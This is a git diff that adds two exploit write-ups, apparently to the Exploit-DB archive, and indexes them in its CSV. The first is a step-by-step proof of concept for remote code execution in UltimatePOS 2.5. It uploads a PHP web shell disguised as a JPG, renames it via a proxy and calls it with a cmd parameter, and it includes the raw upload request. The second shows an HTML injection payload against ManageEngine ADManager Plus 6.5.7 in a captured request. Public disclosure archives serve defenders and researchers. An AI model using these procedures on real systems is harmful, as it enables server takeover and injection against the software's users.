diff --git a/exploits/php/webapps/45253.txt b/exploits/php/webapps/45253.txt new file mode 100644 index 000000000..d4a1d70bb --- /dev/null +++ b/exploits/php/webapps/45253.txt @@ -0,0 +1,64 @@ +# Exploit Title: UltimatePOS 2.5 - Remote Code Execution +# Google Dork: intext:"UltimatePOS" +# Date: 2018-08-22 +# Exploit Author: Renos Nikolaou +# Vendor Homepage: http://ultimatefosters.com/ +# Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431 +# Version: 2.5 +# Tested on: Windows 10 +# CVE: N/A +# Description : UltimatePOS 2.5 allows users to upload arbitrary files which +# leads to a remote command execution on the remote server. + +# PoC +# 1) Create a file with the below PHP code and save it as jpg + + + +# 2) Login to UltimatePOS portal as low priviliage user +# 3) At the left hand side go to Products --> List Products ( http://domain/products ) +# 4) Click at the Actions button of a current product --> Edit +# (NOTE: Attack works if you add new product as well) +# 5) Under Product image: click Browse and upload your jpg file containing the PHP code mentioned at step 1. +# (Make sure to use proxy like Burp, Fiddler etc..etc) +# 6) Scroll Down, click Update and Intercept the request using proxy +# 7) Forward the requests until you reach the from request containing the product details +# (See the request below) including the filename of the file that you have uploaded. +# 8) Edit the filename from filename.jpg to filename.php and then release the Interception. +# 9) Go to the List Products again (Step 3) and fine the product that you have edited. +# 10) Right click at the Product image and select Copy image Location +# 11) Paste the URL into your browser. Will be similar to: http://domain/storage/img/1533988576_cmd.php +# 12) Verify the exploit: http://domain/storage/img/1533988576_cmd.php?cmd=id + + +# The request: +=================== + +POST /products/64 HTTP/1.1 +Host: domain.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://domain.com/products/64/edit +Cookie: +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=---------------------------3062816822434 +Content-Length: 2868 + +... + +50 +-----------------------------3062816822434 +Content-Disposition: form-data; name="image"; filename="cmd.php" +Content-Type: image/jpeg + + + +-----------------------------3062816822434 +Content-Disposition: form-data; name="weight" + +pos_confirmed.PNG + +... \ No newline at end of file diff --git a/exploits/windows/webapps/45254.txt b/exploits/windows/webapps/45254.txt new file mode 100644 index 000000000..13b555f1b --- /dev/null +++ b/exploits/windows/webapps/45254.txt @@ -0,0 +1,51 @@ +# Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection +# Date: 2018-08-21 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.manageengine.com/ +# Hardware Link : https://www.manageengine.com/products/ad-manager/ +# Software : ZOHO Corp ManageEngine ADManager Plus +# Product Version: 6.5.7 +# Vulernability Type : Code Injection +# Vulenrability : HTML Injection +# CVE : CVE-2018-15608 + +# ZOHO Corp ManageEngine ADManager Plus 6.5.7 allows HTML Injection on +# the "AD Delegation" "Help Desk Technicians" screen. + +# HTTP Request Header : + +Request URL: http://172.16.2.105:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows +Request Method: POST +Status Code: 200 OK +Remote Address: 172.16.2.105:8080 +Referrer Policy: no-referrer-when-downgrade +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Length: 301 +Content-type: application/x-www-form-urlencoded;charset=UTF-8 +Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB +Host: 172.16.2.105:8080 +Origin: http://172.16.2.105:8080 +Referer: http://172.16.2.105:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 +X-Requested-With: XMLHttpRequest + +# HTTP Response Header : + +Content-Length: 3753 +Content-Type: text/html;charset=UTF-8 +Date: Tue, 14 Aug 2018 10:14:32 GMT +Server: Apache-Coyote/1.1 +X-Content-Type-Options: nosniff +X-XSS-Protection: 1 + +# Query String Parameters : + +methodToCall: listTechnicianRows + +# Form Data : + +params: {"startIndex":1,"range":10,"searchText":"\">

Ismail Tasdelen

","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView} +adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 63782cc07..b04c64838 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39854,3 +39854,5 @@ id,file,description,date,author,type,platform,port 45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php, 45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows, 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware, +45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php, +45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,